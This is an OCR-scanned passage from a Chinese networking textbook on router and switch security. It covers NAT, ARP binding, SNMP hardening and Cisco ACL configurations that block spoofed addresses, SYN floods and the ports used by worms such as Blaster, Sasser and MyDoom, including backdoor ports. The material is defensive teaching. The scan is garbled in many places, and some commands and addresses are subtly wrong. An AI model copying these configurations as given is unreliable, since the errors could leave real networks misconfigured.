Translation,NAT) 属 接 人 广域网 WAN) 技 术 , 是 一 种 将 私有 (保留 ) 地 址 转化 为 合法 IP 地 
址 的 转换 技术 , 它 被 广泛 应 用 于 各 种 类 型 Internet 接 人 方式 和 各 种 类 型 的 网 络 中 。 在 路 由 
器 上 设置 NAT., 不 仅 完美 地 解决 了 IP 地 址 不 足 的 问题 ,而 且 由 于 可 以 动态 改变 通过 路 由 器 
的 了 了 报 文 源 IP 地 址 及 目的 IP 地 址 ,使 离开 及 进入 的 TP 地 址 与 原来 不 同 , 即 能 够 有 效 地 隐 
藏 内 部 网 络 的 IP 地 址 ,避免 来 自 网 络 外 部 的 攻击 。 

(2) 利用 地 址 解析 协议 防止 盗用 内 部 IP 地 址 。 通 过 地 址 解析 协议 (Address 


实践 


Resolution Protocol. ARP) 可 以 固定 地 将 IP 地 址 绑 定 在 某 一 MAC (Media Access 
Control, 介 质 访问 控制 ) 地 址 之 上 。MAC 地 址 是 网 卡 出 厂 时 写 上 的 48 位 唯一 的 序列 码 ,可 
以 唯一 标示 网 络 上 物理 设备 。 通 过 IP 地 址 与 MAC 地 址 一 对 一 绑 定 ,可 以 有 效 防 止 IP 地 
址 被 冒 用 。 在 路 由 器 上 进行 IP 地 址 与 MAC 地 址 绑 定 时 ,最 好 与 访问 控制 列表 一 起 使 用 。 


4. 利用 访问 控制 列表 有 效 防范 网 络 攻 击 


非法 接 人 、 报 文 窃取 、IP 地 址 欺骗 .拒绝 服务 攻击 等 来 自 网 络 层 和 应 用 层 的 攻击 常常 会 
使 网 络 设备 崩溃 、 网 络 资源 耗 尽 ,访问 控制 列表 (Access Control List,ACL) 在 保障 网 络 边际 
安全 方面 起 着 举足轻重 的 地 位 。 
访问 控制 列表 ACL 使 用 包 过 滤 技 术 , 在 路 由 器 上 读 取 第 三 层 及 第 四 层 数据 包头 中 的 
信息 如 源 地 址 .目的 地 址 、 源 端口 .目的 端口 等 ,根据 预先 定义 好 的 规则 对 包 进 行 过 滤 , 从 而 
达到 访问 控制 的 目的 。ACL 分 为 标准 ACL 和 扩展 ACLCExtended ACL) 两 种 。 标 准 ACL 
只 对 数据 包 的 源 地 址 进行 检查 ,扩展 ACL 对 数据 包 中 的 源 地 址 .目的 地 址 .协议 以 及 端口 
号 进行 检查 。 作 为 一 种 应 用 在 路 由 器 接口 的 指令 列表 ,ACL 已 经 在 一 些 核 心路 由 交换 机 和 
边缘 交换 机 上 得 到 应 用 ,从 原来 的 网 络 层 技术 扩展 为 端口 限 速 .端口 过 滤 .端口 绑 定 等 二 层 
技术 ,实现 对 网 络 各 层面 的 有 效 控制 。 
CD 利用 ACL 禁止 ping 相关 接口 。 对 于 网 络 设备 ,DDoS 攻击 是 最 容易 实施 的 攻击 手 
Br. ln SMURF DDOS 攻击 就 是 用 最 简单 的 命令 ping 来 实现 的 。 利 用 TP 地 址 欺骗 ,结合 
ping 就 可 实现 DDoS 攻击 。 利 用 扩展 ACL 的 “deny icmp any host 192. 168. 3. 1 echo” fiS ,并 
设置 ACL 策略 为 进入 (in) ,就 可 有 效 禁 止 利用 ping 经 过 192. 168. 3. 1 端口 的 DDoS 攻击 。 
(2) 利用 ACL 防止 IP 地址 欺骗 。 一 些 攻击 者 经 常 冒充 园区 网 内 网 卫 地 址 ,实际 却 
是 来 自 外 部 的 包 , 待 获得 一 定 的 服务 权限 后 进行 网 络 攻 击 。 除 了 内 网 私有 地 址 外 ,假冒 
地 址 还 有 回环 地 址 (127. 0. 0.0/8)、DHCP 自 定义 地 址 (169. 254. 0.0/16)、 科 学 文档 作 
者 测试 用 地 址 (192. 0. 2. 0/240 ,不 用 的 组 播 地 址 (224. 0. 0.0/4)、Sun 公司 的 古老 的 测试 
地 址 (20. 20. 20. 0/24、204. 152. 64. 0/23)、 全 网 络 地 址 (0. 0. 0. 0/8) 等 ,需要 通过 ACL 设 
置 ,在 路 由 器 与 外 网 连接 的 进入 方向 ,过 滤 掉 非 公 有 地 址 对 内 部 网 络 的 访问 。 另 一 方面 ,还 
应 采用 访问 列表 控制 流出 内 部 网 络 的 地 址 必须 是 属于 内 部 网 络 的 ,也 就 是 防止 内 部 对 外 部 
进行 IP 地 址 欺骗 。 也 可 以 通过 路 由 器 log 日 志 查 看 内 部 网 络 中 哪些 用 户 试图 进行 IP 地 址 
欺骗 ,针对 性 地 设置 防 IP 地 址 欺骗 的 ACL。 
(3) 利用 ACL 防止 SYN 攻击 。 目 前 ,一 些 路 由 器 的 软件 平台 可 以 开启 TCP 拦截 功 
能 ,防止 SYN 攻击 ,工作 模式 分 拦截 和 监视 两 种 ,默认 情况 是 拦截 模式 。 
。 拦截 模式 : 路 由 器 响应 到 达 的 SYN 请 求 , 并 且 代 替 服 务 器 发 送 一 个 SYN-ACK 报 
文 , 然 后 等 待 客户 机 ACK。 如 果 收 到 ACK ,再 将 原来 的 SYN 报 文 发 送 到 服务 器 。 

。 监视 模式 : 路 由 器 允许 SYN 请 求 直 接 到 达 服务 器 ,如 果 这 个 会 话 在 30s 内 没有 建立 
起 来 ,路 由 器 就 会 发 送 一 个 RST, 以 清除 这 个 连接 。 

这 种 配置 首先 要 配置 访问 列表 ,以 备 开 启 需要 保护 的 IP 地 址 ,代码 如 下 。 


access list [1— 199] [deny | permit] tcp any destination destination- wildcard 


然后 ,开启 TCP 拦截 代码 如 下 。 


Ip tcp intercept mode intercept; Ip tcp intercept list access list - number; Ip tcp intercept 

mode watch 

(4) 利用 ACL 防范 网 络 病毒 攻击 

各 种 网 络 病毒 往往 是 使 用 具有 病毒 特征 的 TCP 或 UDP 端口 对 用 户 发 起 攻击 ,例如 冲 
击 波 病毒 使 用 TCP 135、139、445、593 等 端口 ,震荡 波 病毒 使 用 TCP 445、5554、9996 等 端 
口 ,SQL 蠕虫 病毒 使 用 TCP1433、UDP1434 等 端口 。 基 于 ACL 的 网 络 病毒 过 滤 技 术 在 一 
定 程 度 上 可 以 把 病毒 拒 之 门 外 , 较 好 地 保护 内 网 用 户 免 遭 外 界 病毒 的 干扰 。 

几 种 常见 病毒 的 特征 端口 及 对 应 ACL 策略 如 下 。 


5. 


W32. sasser 蠕虫 : 该 病毒 使 用 端口 TCP 135、139、445( 使 用 该 端口 进行 攻击 ); 
TCP 1025、5554( 使 用 该 端口 传送 蠕虫 程序 ); TCP 9996( 攻 击 中 使 用 端口 )。 网 络 
控制 方法 是 在 路 由 器 上 添加 ACL 语句 来 阻 断 上 述 端口 。 

W32. Nachi. Wo WHA : 该 蠕虫 利用 了 Microsoft Windows DCOM RPC 接口 远程 
缓冲 区 溢出 漏洞 。UDP 69 端口 用 于 文件 下 载 ; TCP 135 端口 用 于 微软 DCOM 
RPC; ICMP echo request(type 8) 用 于 发 现 活动 主机 。 在 路 由 器 上 添加 ACL 语句 
来 阻 断 TCP 135、UDP 69 端口 。 

W32. Blaster. Worm 蠕虫 : 利用 端口 TCP 4444( 蠕 虫 开设 的 后 门 端口 ,用 于 远程 控 
制 )、UDP 69( 用 于 文件 下 载 )、TCP 135( 微 软 DCOM RPC) 。 在 路 由 器 上 添加 ACL 
语句 ,可 以 阻 断 TCP 135,4444 及 UDP 69 端口 。 

MyDoom 病毒 : 这 是 一 种 通过 电子 邮件 附件 和 P2P 网 络 Kazaa 传播 的 病毒 , 当 用 户 
打开 并 运行 附件 内 的 病毒 程序 后 ,病毒 就 会 以 用 户 信箱 内 的 电子 邮件 地 址 为 目标 ， 
伪造 邮件 的 源 地 址 ,向 外 发 送 大 量 带 有 病毒 附件 的 电子 邮件 ,同时 在 用 户主 机 上 留 
下 可 以 上 载 并 执行 任意 代码 的 后 门 (TCP 31273198 范围 内 )。 为 此 需 在 路 由 器 上 
添加 如 下 ACL 语句 : deny tcp any any range 3127 3198, 

Nachi 病毒 变种 : Nachi. B 蠕虫 利用 Microsoft RPC 接口 远程 任意 代码 可 执行 漏洞 
(使 用 TCP 135 ij H), Microsoft IIS 5. 0 缓冲 区 溢出 漏洞 (使 用 TCP 80 端口 )、 
Windows 系统 的 Workstation 服务 缓冲 区 溢出 漏洞 (使 用 TCP 445 Hi H), Windows 
Locator 服务 远程 缓冲 区 溢出 漏洞 (使 用 TCP 445 端口 ) 进 行 传播 。 应 在 路 由 器 上 
添加 相应 ACL 语句 。 不 过 这 里 要 注意 ,由 于 TCP 80 是 WWW 服务 的 默认 端口 , 显 
然 不 能 阻 断 , 否 则 用 户 无 法 访问 网 站 。 


防止 包 嗅 探 


攻击 者 经 常 将 嗅 探 软件 安装 在 已 经 侵入 的 网 络 上 的 计算 机 内 ,监视 网 络 数据 流 , 从 而 次 
窃 密 码 ,包括 SNMP 通信 密码 ,也 包括 路 由 器 的 登录 和 特权 密码 ,这 样 可 以 冒充 网 络 管理 员 
进行 操作 而 影响 网 络 的 安全 性 。 在 不 可 信任 的 网 络 上 不 要 用 非 加 密 协议 登录 路 由 器 。 如 果 
路 由 器 支持 加 密 协议 ,要 使 用 SSH 或 Kerberized Telnet, 或 使 用 IPSec 加 密 路 由 器 所 有 的 
管理 流 。 


6. 


校 验 数据 流 路 径 的 合法 性 


{EJ RPF (Reverse path forwarding) 反 相 路 径 转 发 ,由 于 攻击 者 地 址 是 违法 的 ,所 以 攻 


实践 


击 包 被 丢弃 ,从 而 达到 抵御 spoofing 攻击 的 目的 。RPF 反 相 路 径 转发 的 配置 命令 为 “ip 
verify unicast rpf”。 需 要 注意 的 是 路 由 器 要 支持 CEF (Cisco Express Forwarding) 快速 


7. 为 路 由 器 间 的 协议 交换 增加 认证 功能 ,提高 网 络 安全 性 


路 由 器 的 一 个 重要 功能 是 路 由 的 管理 和 维护 。 目 前 具有 一 定 规模 的 网 络 都 采用 动态 的 
路 由 协议 ,常用 的 路 由 协议 有 RIP、.EIGRP、OSPF、IS-IS、BGP 等 。 当 一 台 设 置 了 相同 路 由 
协议 和 相同 区 域 标示 符 的 路 由 器 加 入 网 络 后 ,会 学 习 网 络 上 的 路 由 信息 表 。 但 此 种 方法 可 
能 导致 网 络 拓扑 信息 泄露 ,也 可 能 由 于 向 网 络 发 送 自己 的 路 由 信息 表 , 扰 乱 网 络 上 正常 工作 
的 路 由 信息 表 , 严 重 时 可 以 使 整个 网 络 瘫 疾 。 这 个 问题 的 解决 办 法 是 对 网 络 内 的 路 由 器 之 
间 相 互 交流 的 路 由 信息 进行 认证 。 当 路 由 器 配置 了 认证 方式 ,就 会 鉴别 路 由 信息 的 收发 方 。 
有 两 种 鉴别 方式 ,其 中 纯 文 本 方式 安全 性 低 ,建议 使 用 MD5 方式 。 


8. 使 用 安全 的 SNMP 管理 方案 


SNMP 广泛 应 用 在 路 由 器 的 监控 ,配置 方面 。SNMP Version 1 在 穿越 公 网 的 管理 应 
用 方面 安全 性 低 , 不 适合 使 用 。 利 用 访问 列表 仅仅 允许 来 自 特定 工作 站 的 SNMP 访问 , 通 
过 这 一 功能 可 以 来 提升 SNMP 服务 的 安全 性 能 。 配 置 命 令 为 "snmp-server community 
xxxxx RW xx”, 其 中 ,xx 是 访问 控制 列表 号 。SNMP Version 2 使 用 MD5 数字 身份 鉴别 方 
式 。 不 同 的 路 由 器 设备 配置 不 同 的 数字 签名 密码 ,这 是 提高 整体 安全 性 能 的 有 效 手段 。 


10.2.2 路 由 器 的 安全 配置 


1. 路 由 器 口令 安全 配置 
CD 路 由 器 特权 用 户口 令 配置 。Cisco 路 由 器 上 可 以 对 口令 加 密 ,命令 如 下 。 


Router # conf t 

Router(config) # service password - encryption 

Router(config) # enable secret XXXXXX 

前 一 条 命令 告诉 IOS 如 何 对 于 存放 在 配置 文件 中 的 密码 .CHAP secrets 和 其 他 数据 进 
行 加 密 ,但 使 用 的 加 密 算法 比较 简单 ,安全 性 不 高 ,所 以 如 果 是 关键 密码 最 好 不 要 使 用 此 命 
令 加 密 ; 后 一 条 命令 用 了 为 IOS 的 特权 用 户 设置 加 密 密 码 , 它 使 用 比较 好 的 MD5 算法 对 口 
令 进行 散 列 处 理 , 所 以 关键 密码 应 采用 此 加 密 方 法 。 特 权 用 户口 令 设置 命令 如 下 。 

Router > enable 

Router # conf t 


Router(config) # enable secret XXXXXX 
Router(config) # exit 


(2) 端口 登录 口令 配置 ,设置 如 下 。 


Router # 
Router # conf t 


Router(config) # line VTY 0 4 
Router(config- line) # login 
Router(config- line) password XXXX 
Router(config- line) # exit 
Router(config) # line aux 0 
Router(config- line) # login 
Router(config- line) password YYYY 
Router(config- line) # exit 
Router(config) # line con 0 
Router(config- line) # login 
Router(config- line) # password ZZZZ 
Router(config- line) # Exit 
Router(config) # 


2. 路 由 器 网 络 服务 的 安全 设置 


为 了 路 由 器 的 安全 ,禁止 那些 不 必要 的 或 容易 引起 网 络 攻击 的 网 络 服务 ,常用 命令 
如 下 。 


Router(config) # no ip http server 
Router(config) # no service tcp - small- servers 
Router(config) # no service udp - small- servers 
Router(config) # no ip finger 

Router(config) # no service finger 
Router(config) # no ip bootp server 
Router(config) # no ip proxy- arp 
Router(config- if) # no ip proxy- arp 
Router(config) # no ip domain - lookup 
Router(config) # no cdp run 

Router(config- if) no cdp enable 
Router(config) # no ip source - route 
Router(config- if) # no ip directed - broadcast 
Router(config- if) # no ip redirects 
Router(config- if) # no ip unreachables 
Router(config- if) # no ip mask - reply 


3. 保护 内 部 网 络 IP 地 址 的 配置 


在 路 由 器 上 配置 网 络 地 址 转换 (NAT) ,可 以 保护 内 部 网 络 。 配 置 保护 内 部 网 络 的 地 址 
转换 ,需要 设置 对 内 和 对 外 的 网 络 接口 ,命令 如 下 。 

Router(config) # int el/0 

Router(config- if) # ip nat inside 

Router(config- if) # exit 

Router(config) # int s0/0 

Router(config- if) # ip nat outside 

上 述 配置 选择 el/0 作为 内 部 接口 ,s0/0 作为 外 部 接口 。 使 用 访问 控制 列表 定义 内 部 
地 址 池 的 命令 如 下 。 


Router(config) # access — list 10 permit 192.168.100.0 0.0.0.255 


实践 


配置 静态 地 址 转换 并 开放 WEB 端口 (TCP 80) 的 命令 如 下 。 
Router(config) # ip nat inside source static tcp list 10 int s0/0 80 


(1) 静态 转换 配置 实例 。 

某 内 部 局 域 网 使 用 的 IP 地 址 段 为 192. 168. 0. 1— 192. 168. 0. 254, 路 由 器 局 域 网 段 ( 即 默 
认 网 关 ) 的 全 地 址 为 192.168.0.1, 子 网 掩 码 为 255. 255. 255. 0。 网 络 服务 商 分 配 的 合法 全 地 
址 范围 为 61. 159. 62. 128— 61. 159. 62. 135 ,路 由 器 在 广域网 中 的 TP 地 址 为 61. 159. 62. 129 , 子 
网 掩 码 为 255. 255. 255. 248 可 用 于 转换 的 IP 地址 范围 为 61. 159.62. 130 一 61. 159.62. 134。 要 
求 将 内 部 网 址 192. 168. 0. 2 一 192. 168. 0. 6 分 别 转换 为 合法 IP 地 址 61. 159. 62. 130 一 
61. 159. 62. 134 ,配置 过 程 如 下 。 

D 设置 外 部 端口 ,代码 如 下 。 

Router(config) # interface serial 0 


Router(config- if)ip address 61.159.62.129 255.255.255.248 
Router(config- if)ip nat outside 


@ 设置 内 部 端口 ,代码 如 下 。 


Router(config)interface ethernet 0 
Router(config- if)ip address 192.168.0.1 255.255.255.0 
Router(config- if)ip nat inside 
© 在 内 部 本 地 与 合法 地 址 之 间 建 立 静态 地 址 转换 ,全 局 配置 模式 下 所 用 命令 格式 为 
“ip nat inside source static [内 部 本 地 地 址 ] [合法 地 址 ]”, 意 思 是 将 [内 部 网 络 地 址 ] 转 换 为 
[合法 IP 地 址 ]。 示 例如 下 。 
ip nat inside source static 192.168.0.2 61.159.62.130 // 将 内 部 网 络 地 址 192.168.0.2 转换 
// 为 合法 IP 地 址 61.159. 62.130 
ip nat inside source static 192.168.0.3 61.159.62.131 // 将 内 部 网 络 地 址 192.168.0.3 转换 
// 为 合法 IP 地 址 61.159.62.131 
ip nat inside source static 192.168.0.4 61.159.62.132 // 将 内 部 网 络 地 址 192.168.0.4 转换 
// 为 合法 IP 地址 61.159.62.132 
ip nat inside source static 192.168.0.5 61.159.62.133 // 将 内 部 网 络 地 址 192.168.0.5 转换 
// 为 合法 IP 地 址 61.159.62.133 


ip nat inside source static 192.168.0.6 61.159.62.134 // 将 内 部 网 络 地 址 192.168.0.6 转换 
// 为 合法 IP 地址 61.159.62.134 


(2) 动态 转换 配置 实例 。 

某 内 部 网 络 使 用 的 IP 地 址 段 为 172. 16. 100. 1 一 172. 16. 100. 254 ,路 由 器 局 域 网 端口 ( 即 
默认 网 关 ) 的 IP 地 址 为 172. 16. 100. 1 , 子 网 掩 码 为 255. 255. 255. 0。 网 络 分 配 的 合法 IP 地 址 
范围 为 61. 159. 62. 128 一 61. 159. 62. 191 ,路 由 器 在 广域网 中 的 IP 地址 为 61. 159. 62. 129 , 子 网 
HEH 255. 255. 255. 192, 可 用 于 转换 的 IP 地 址 范围 为 61. 159. 62. 130 一 61. 159. 62. 190。 要 
求 将 内 部 网 址 172. 16. 100. 1 一 172. 16. 100. 254 动态 转换 为 合法 IP 地 址 61. 159. 62. 130— 
61. 159. 62. 190 ,配置 过 程 如 下 。 

CD 设置 外 部 端口 (可 以 定义 多 个 外 部 端口 ) ,代码 如 下 。 


interface serial 0 // 进 入 串 行 端口 serial 0 


ip address 61.159.62.129 255.255.255.248 // 将 其 IP 地 址 指定 为 61.159. 62.129, 子 网 掩 码 为 
//255.255.255.248 
ip nat outside / ERRAT serial 0 设置 为 外 网 端口 


@ 设置 内 部 端口 (可 以 定义 多 个 内 部 端口 ) ,命令 如 下 。 


interface ethernet 0 // 进 入 以 太 网 端口 Ethernet 0 

ip address 172.16.100.1 255.255.255.0 // 将 其 莫 地 址 指定 为 172.16.100.1, 子 网 掩 码 为 
//255.255.255.0 

ip nat inside // 将 Ethernet 0 设置 为 内 网 端口 


O 定义 合法 TP 地址 池 ( 地 址 池 名 字 可 以 任意 设 定 ) ,命令 如 下 。 


ip nat pool net 61.159.62.130 61.159.62.190 netmask 255.255.255.192  // 指 明 地 址 缓冲 池 的 
// 名 称 为 net, IP 地 址 范围 为 61.159.62.130~61.159.62.190, 子 网 掩 码 为 255. 255. 255.192 


或 者 利用 如 下 命令 。 
ip nat pool test 61. 159.62. 130 61.159.62.190 prefix- length 26 


注意 : 如 果 有 多 个 合法 IP 地 址 范围 ,可 以 分 别 添加 。 例 如 ,如 果 还 有 一 段 合法 IP 地 址 
范围 为 211. 82. 216. 1—211. 82. 216. 254 ,那么 ,可 以 再 通过 下 述 命 令 将 其 添加 至 缓冲 池 中 。 


ip nat pool cernet 211.82.216.1 211.82.216.254 netmask 255. 255. 255. 0 
或 者 利用 如 下 命令 。 

ip nat pool cernet 211.82.216.1 211.82.216.254 prefix- length 24 

@ 定义 内 部 网 络 中 允许 访问 Internet 的 访问 列表 ,命令 如 下 。 


access - list 1 permit 172.16.100.0 0.0.0.255 // 允 许 访问 Internet ff] BE 172.16.100.0— 
//172.16.100.255, 反 掩 码 为 0.0.0.255. 需 要 注意 的 是 ,在 这 里 采用 的 是 反 掩 码 ,而 非 子 网 掩 码 


另外 ,如 果 想 将 多 个 IP 地 址 段 转换 为 合法 IP 地 址 ,可 以 添加 多 个 访问 列表 。 例 如 , 当 
MA 172. 16. 98. 0—172. 16. 98. 255 和 172. 16. 99. 0 一 172. 16. 99. 255 转换 为 合法 TP 地 址 
时 ,应 当 添加 下 述 命令 。 


access - list2 permit 172.16.98.0 一 0.0.0.255 
access - list2 permit 172.16.99.0—0.0.0.255 


© 实现 网 络 地 址 转换 。 在 全 局 设置 模式 下 ,将 由 access — list 指定 的 内 部 本 地 地 址 与 
指定 的 合法 地 址 池 进 行 地 址 转换 (命令 语法 为 “ip nat inside source list” 访 问 列表 标号 pool 
内 部 合法 地 址 池 名 字 ) ,命令 如 下 。 


ip nat inside source list 1 pool chinanet 

如 果 有 多 个 内 部 访问 列表 ,可 以 一 一 添加 ,以 实现 网 络 地 址 转换 ,示例 如 下 。 
ip nat inside source list 2 pool chinanet 

如 果 有 多 个 地 址 池 , 也 可 以 一 一 添加 ,以 增加 合法 地 址 池 范 围 , 示 例如 下 。 


Ip nat inside source list 2 pool cernet 


实践 


(3) 防止 内 部 IP 地 址 盗用 (地 址 绑 定 ) 配 置 实例 。 
如 图 10-1 所 示 ,如 果 只 让 ftp_server 和 www_server 访问 网 段 2, 又 要 防止 ftp_server 
和 www. server 的 IP 地 址 被 冒名 ,可 以 进行 如 下 设置 。 


Router2(config) # Arp 192.68.1.1 0671.0232.0001 arpa 
Router2(config) # Arp 192.68.1.2 0671.0232.0002 arpa 
Router2(config) access - list 99 permit 192.68.1.1 
Router2(config) # access - list 99 permit 192.68.1.2 
Router2(config) # deny any 

Router2(config) # interface Ethernet 0 

Router2(config- if) # ip address 76.68.16.254 255.255.255.0 
Router2(config- if) & ip access- group 99 in 


192.68.1.2 


eO  routerl s0 


76.68.16.1 ET. 


图 10-1 地 址 绑 定 网 络 结构 图 


4. 利用 ACL 防范 网 络 攻击 的 配置 
标准 访问 控制 列表 ACL 的 配置 如 下 : 


Router # config t 

Router(config) # access - list 10 deny host 192.168.1.1 

Router(config) # access - list 10 permit host 192.168.1.0 0.0.0.255 

CD 利用 ACL 禁止 ping 攻击 。 通 过 配置 ACL 禁止 ping 路 由 器 相关 接口 (例如 地 址 为 
192. 168. 3. 1 接口 ) ,命令 如 下 。 


Router(config) # access - list 101 deny icmp any host 192.168.3.1 echo 
Router(config- if) # access - group 101 in 


通过 ACL 配置 ,可 以 防止 蠕虫 病毒 Nachi( 冲 击 波 克 星 ) 的 扫描 ,命令 如 下 。 


Router #configt 

Router(config) # access- list 101 deny ICMP any any echo 

(2) 利用 ACL 防止 IP 地 址 欺骗 的 配置 。 

O 利用 ACL 过 滤 防 止 对 内 IP 地 址 欺骗 。 配 置 扩展 访问 控制 列表 ,过 滤 私 有 地 址 的 配 
置 命令 如 下 。 


Router#conf t 


Router(config) # int s0/0 

Router(config- if) # ip access - group 101 in 

Router(config- if) # exit 

Router(config) # access - list 101 deny ip 10. 0.0.0 0.255.255.255 any log 
Router(config) # access - list 101 deny ip 172.16.0.0 0.0. 255.255 any log 
Router(config) # access - list 101 deny ip 192.168.0.0 0. 0.255.255 any log 
Router(config) # access - list 101 deny ip 127.0.0.0 0.0.0.255 any log 
Router(config) # access - list 101 permit ip any any 


防止 对 内 IP 地 址 欺骗 ,常用 配置 命令 如 下 。 


Router(Config)# access - list 100 deny ip 127.0.0.0 0.255.255.255 any 
Router(Config) # access- list 100 deny ip 192.168.0.0 0.0.255.255 any 
Router(Config) # access - list 100 deny ip 172.16.0.0 0.15.255.255 any 
Router(Config) & access - list 100 deny ip 10.0.0.0 0.255.255.255 any 
Router(Config) # access - list 100 deny ip 169.254.0.0 0.0.255.255 any 
Router(Config) # access - list 100 deny ip 192.0.2.0 0.0.0.255 any 
Router(Config) # access - list 100 deny ip 224.0.0.0 15.255.255.255 any 
Router(Config) # access - list 100 deny ip 20.20.20.0 0.0.0.255 any 
Router(Config)£ access - list 100 deny ip 204.152.64.0 0.0.2.255 any 
Router(Config) # access - list 100 deny ip 0.0.0.0 0.255.255.255 any 
Router(Config) # access- list 100 permit ip any any 

Router(Config- if) & ip access - group 100 in 


© 利用 ACL 过 滤 内 部 地 址 防止 对 外 IP 地 址 欺骗 。 其 配置 命令 如 下 。 


Router(Config) # no access- list 101 

Router(Config) # access - list 101 permit ip 192.168.0.0 0.0.255.255 any 
Router(Config) # access - list 101 deny ip any any 

Router(Config) & interface eth 0/1 

Router(Config- if) # description "internet Ethernet" 

Router(Config- if) # ip address 192.168.0.254 255.255.255.0 
Router(Config- if) # ip access- group 101 in 


(3) 利用 ACL 防止 SYN 攻击 。 
CD 配置 访问 列表 ,以 备 开 启 需要 保护 的 IP 地 址 ,命令 如 下 。 


access list [1— 199] [deny| permit] tcp any destination destination- wildcard 
© 开启 TCP 拦截 ,命令 如 下 。 


Ip tcp intercept mode intercept 
Ip tcp intercept list access list - number 
Ip tcp intercept mode watch 


5. 利用 ACL 防范 病毒 攻击 的 配置 
通过 ACL 配置 可 以 控制 Blaster( 冲 击 波 ) 蠕 虫 的 传播 ,其 配置 命令 如 下 。 


Router # conf t 
Router(config) # access - list 101 deny tcp any any eq 4444 
Router(config) # access - list 101 deny udp any any eq 69 
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通过 ACL 配置 可 以 控制 Blaster( 冲 击 波 ) 蠕 虫 扫 描 和 攻击 ,其 配置 命令 如 下 。 


Router#conf t 

Router(conf ig) # access — list 101 deny tcp any any eq 135 
Router(config) # access - list 101 deny udp any any eq 135 
Router(conf ig) # access - list 101 deny tcp any any eq 139 
Router(config) # access - list 101 deny udp any any eq 139 
Router(config) # access - list 101 deny tcp any any eq 445 
Router(config) # access - list 101 deny udp any any eq 445 
Router(config) # access — list 101 deny tcp any any eq 593 
Router(config) # access - list 101 deny udp any any eq 593 


通过 ACL 配置 可 以 控制 Slammer 蠕虫 的 传播 ,其 配置 命令 如 下 。 


Router(config) # access - list 101 deny udp any any eq 1434 

Router(config) # access - list 101 permit ip any any 

通过 上 述 配 置 后 ,为 了 防止 外 来 的 病毒 攻击 和 内 网 向 外 发 起 的 病毒 攻击 ,可 以 将 访问 控 
制 规则 应 用 在 广域网 端口 ,命令 如 下 。 

Router # int s 0/0 


Router(Config- if) # ip access - group 101 in 
Router(Config- if) # ip access - group 101 out 


如 下 是 汇总 的 利用 ACL 防范 病毒 攻击 的 常用 配置 命令 。 


deny icmp any any echo - reply // 拒 绝 任何 应 答 
deny icmp any any host - unreachable // 拒 绝 任 何 无 法 接 通 的 主机 
deny udp any any eq snmp // 拒 绝 引入 的 SNMP 


deny tcp any any eq 135 

deny udp any any eq 135 

deny tcp any any eq 136 

deny tcp any any eq 137 

deny tcp any any eq 138 

deny tcp any any eq 139 

deny tcp any any eq 445 

deny udp any any eq 445 

deny tcp any any eq 593 

deny tcp any any eq 707 

deny tcp any any eq 1023 

deny udp any any eq 1052 

deny tcp any any eq 1068 

deny tcp any any eq 1080 

deny udp any any eq 1025 

deny tcp any any eq 1433 

deny tcp any any eq 1434 

deny udp any any eq 1434 

deny udp any any eq 1978 

access - list 101 deny udp any eq 2000 // 拒 绝 引 入 的 openwindows 
access - list 101 deny tcp any any eq 2000 // 拒 绝 引 入 的 openwindows 
deny udp any any eq 2002 

access - list 101 deny udp any any eq 2049 // 拒 绝 引入 的 NFS 


access - list 101 deny tcp any any eq 2049 // 拒 绝 引 入 的 NFS 
deny tcp any any eq 2745 

deny tcp any any eq 2847 

deny tcp any any eq 3055 

deny tcp any any eq 3127 

deny tcp any any eq 3128 

deny tcp any any eq 3198 

deny tcp any any eq 3372 

deny udp any any eq 4156 

deny tcp any any eq 4444 

deny udp any any eq 4444 

deny tcp any any eq 4662 

deny tcp any any eq 6000 

deny tcp any any eq 8006 

deny udp any any eq 8006 

deny tcp any any eq 8094 

deny udp any any eq 8094 

deny udp any any eq 10702 

deny udp any any eq 13072 

deny udp any any eq 16881 

deny udp any any eq netbios - ns 
deny udp any any eq netbios - dgm 
access - list 101 permit ip any any // 其 他 均 允 许 


6. 利用 ACL 对 HTTP 服务 进行 服务 控制 及 权限 管理 
对 HTTP 服务 进行 服务 控制 及 权限 管理 的 命令 如 下 。 
Router(conf ig) # access - list 1 permit 10.17.36.130 


Router(config) # ip http access - class 1 
Router(config) # ip http authentication aaa 


10.3 交换 机 的 安全 技术 


在 一 个 园区 网 络 中 ,交换 机 作为 内 部 网 络 的 核心 和 骨干 ,无 论 是 处 于 数据 交换 枢纽 的 核 


Abs 汇聚 交 换 机 ,还 是 直接 面 对 用 户 的 接 入 交换 机 ,其 安全 性 对 整个 内 部 网 络 的 安全 起 着 举 
足 轻重 的 作用 。 


10.3.1 交换 机 存在 的 安全 问题 及 对 策 


交换 机 最 大 的 安全 隐患 在 于 交换 机 端口 随意 的 物理 接 人 和 交换 机 缺乏 有 效 控制 的 不 安 


全 登录 行为 。 目 前 市 面 上 的 大 多 数 二 层 、 三 层 交 换 机 都 具有 丰富 的 安全 功能 ,可 以 满足 各 种 
应 用 对 交换 机 安全 的 需求 。 


1. 利用 交换 机 端口 安全 技术 限制 端口 接 入 的 随意 性 
交换 机 端口 物理 接 入 的 随意 性 主要 体现 在 用 户 将 一 台 来 历 不 明 、 非 法 或 未 经 授权 的 计 
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算 机 随意 连接 到 交换 机 的 一 个 端口 ,或 者 用 户 使 用 来 历 不 明 、 非 法 或 未 经 授权 的 交换 机 或 
HUB 随意 连接 到 交换 机 的 一 个 端口 ,以 便 连 入 更 多 的 非法 计算 机 。 这 样 大 大 增加 了 在 局 
域 网 进行 内 部 攻击 如 MAC 地 址 攻击 、ARP 攻击 、IP/MAC 地 址 欺骗 等 的 风险 ,从 而 容易 给 
网 络 设备 造成 破坏 。 因 此 需要 对 交换 机 端口 进行 安全 地 址 绑 定 ,限制 交换 机 端口 的 最 大 连 
接 数 ,以 便 只 允许 特定 MAC 地 址 的 设备 接 和 人 到 网 络 中 ,同时 防止 用 户 将 过 多 的 设备 接 人 到 
网 络 。 当 交换 机 完成 端口 安全 配置 (switchport port-security) 后 ,如 果 有 违例 产生 时 ,交换 
机 将 丢弃 接收 到 的 帧 (MAC 地 址 不 在 安全 地 址 表 中 ) ,或 发 送 一 个 SNMP trap 报 文 ,或 关闭 
该 端口 。 

目前 大 多 数 二 层 三 层 交 换 机 都 具有 这 种 端口 安全 功能 ,即将 MAC 地 址 锁定 在 端口 
上 ,以 阻止 非法 的 MAC 地 址 连接 网 络 。 这 样 的 交换 机 能 设置 一 个 安全 地 址 表 ,并 提供 基于 
该 地 址 表 的 过 滤 ,也 就 是 说 只 要 在 地 址 表 中 的 MAC 地 址 发 来 的 数据 包 才 能 在 交换 机 的 指 
定 端口 进行 网 络 连接 ,和 否则 不 能 。 


